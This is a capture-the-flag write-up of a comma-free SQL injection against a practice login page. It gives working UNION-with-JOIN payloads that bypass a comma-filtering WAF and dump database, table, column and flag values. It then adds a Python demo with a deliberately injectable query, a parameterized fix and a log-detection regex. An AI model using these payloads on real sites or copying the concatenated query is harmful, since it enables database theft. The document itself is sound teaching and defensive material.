Today I worked through the challenge above and want to record it.
Viewing the page source gives the hint to visit login.php?id=1.
After capturing with Burp there was no useful information. Reading other people's writeups, I found that you have to capture the very first page request; there a 302 redirect shows up. Put simply, there is a page that redirects before you reach the actual challenge page.
The real URL is l0gin.php?id=1.
Everything below is against that file.
First, the usual routine: test which characters are filtered.
When sending id=1' and ascii(substr((select database()),1,1))>64%23
it turned out that the comma is blocked by the WAF.
So this is a comma-free injection; worth noting down.
If the comma were not a problem, the normal routine would be:
?id=-1' union select 1,2#
?id=-1' union select database(),2#
?id=-1' union select table_name from information_schema.tables where table_schema=database() #
Using join instead of commas:
1. Database name:
-1' union select * from (select database()) a join (select 2) b %23
The database name is sqli.
2. Table names:
-1' union select * from (select group_concat(distinct(table_name)) from information_schema.tables where table_schema='sqli') a join ( select 2 ) b %23
3. Column names:
-1 ' union select * from (select group_concat(distinct(column_name)) from information_schema.columns where table_schema='sqli' and table_name='users') a join ( select 2 ) b %23
4. Read the flag:
-1' union select * from (select group_concat(distinct(flag_9c861b688330)) from users) a join (select 2) b %23
flag{39502a7a-7f1d-4bd4-bd72-eddba8603eea}
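As an added example from the defender's side (not part of the writeup): the query construction that makes an l0gin.php-style page injectable, next to the parameterized form that turns the same JOIN payload back into an ordinary id lookup, plus a detection regex run over constructed request lines that flags the comma-free UNION shape even though a comma filter lets it through. The table, rows, function names and log lines are assumptions built for this example; it uses SQLite so it runs offline, which is why the payload ends in `-- ` instead of MySQL's `#` (`%23`).

```python
import re
import sqlite3

# Constructed stand-in for the challenge's `users` table. The flag column name
# is the one the writeup dumped; the row contents are made up for this example.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER, username TEXT, flag_9c861b688330 TEXT)"
    )
    conn.execute("INSERT INTO users VALUES (1, 'admin', 'flag{placeholder}')")
    conn.commit()
    return conn


def lookup_vulnerable(conn, user_id):
    # The pattern behind an injectable l0gin.php: the id is spliced into the
    # SQL text, so a quote in the input closes the literal and starts new syntax.
    sql = f"SELECT id, username FROM users WHERE id = '{user_id}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_id):
    # Parameter binding: the id reaches the engine as data, never as SQL.
    sql = "SELECT id, username FROM users WHERE id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


def comma_filter_blocks(value):
    # Stand-in for the WAF rule the writeup ran into: reject only the comma.
    return "," in value


# Detection: match the shape of a comma-free UNION (derived tables glued
# together with JOIN), case-insensitive, whatever spacing is used.
UNION_JOIN = re.compile(
    r"union\s+select\s+\*\s+from\s*\(\s*select\b.*?\)\s*\w+\s+join\s*\(\s*select\b",
    re.IGNORECASE | re.DOTALL,
)


def looks_like_comma_free_union(value):
    return bool(UNION_JOIN.search(value))


def scan_log(lines):
    """Return the request lines whose query string has the JOIN shape."""
    return [line for line in lines if looks_like_comma_free_union(line)]


# The writeup's first JOIN payload, adapted to SQLite comment syntax.
PAYLOAD = "-1' union select * from (select 'injected') a join (select 2) b -- "

# Constructed, URL-decoded access-log lines: one benign, two from the writeup.
SAMPLE_LOG = [
    "GET /l0gin.php?id=1 HTTP/1.1",
    "GET /l0gin.php?id=-1' union select * from (select database()) a join (select 2) b # HTTP/1.1",
    "GET /l0gin.php?id=-1' union select * from (select group_concat(distinct(table_name)) "
    "from information_schema.tables where table_schema='sqli') a join ( select 2 ) b # HTTP/1.1",
]


def demo():
    conn = make_db()
    return {
        "comma_filter_blocks": comma_filter_blocks(PAYLOAD),  # False: no comma
        "vulnerable": lookup_vulnerable(conn, PAYLOAD),       # attacker-chosen row
        "safe": lookup_safe(conn, PAYLOAD),                   # []: treated as an id
        "flagged_lines": len(scan_log(SAMPLE_LOG)),           # 2
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The point of running both lookups with the same input is that the character blocklist and the parameterized query fail in opposite ways: the blocklist passes the payload and the concatenated query executes it, while the bound parameter never becomes SQL, so the only durable fix is on the query side; the regex is a detection aid for traffic review, not a replacement for that fix.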